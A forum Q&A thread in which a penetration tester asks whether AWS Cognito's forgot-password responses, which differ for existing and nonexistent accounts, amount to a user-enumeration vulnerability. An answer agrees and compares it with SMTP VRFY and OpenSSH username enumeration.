0

Am doing a pen test on a client system using AWS Cognito and userpools for authentication using the client side SDK provided by AWS.

during the forget password flow, I noticed that Cognito request returns 400 with a payload of 

__type  UserNotFoundException
message Username/client id combination not found.

and 200 when a user is found

CodeDeliveryDetails {}
AttributeName   email
DeliveryMedium  EMAIL
Destination j***@g***.com

Is this considered a vulnerability? It seems to be for me. Its kinda a leak of information. When anyone can check if an email has an account with my app by calling this url.

Another attack vector would be brute forcing against known emails for a list of users on the app for marketing or phishing purposes.

ideally for this flow you would want Cognito to return 200 regardless of if the email exist or not.

I know what is considered a vulnerability is never black and white but this seems to be an issue for me given AWS is so big and trusted.

jia chen
  • 149
  • 4

1 Answers1

1

Yes this is a vulnerability, more than one vector is depend on same logic, examples listed below.

  • SMTP VRFY option enabled
  • OpenSSH Username Enumeration
  • SIP INVITE/REGISTER Response User Enumeration

BUT as you mentioned vulnerability is never black and white, AWS can consider this is a risk and they may implemented rate limiting, if so they are reduce risk significantly.

alnbhclyn
  • 254
  • 1
  • 7
  • +1 Yes I will try to log an issue with them. Ideally there this should be configurable on the aws dashboard given the scale of Cognito! – jia chen May 31 '19 at 09:40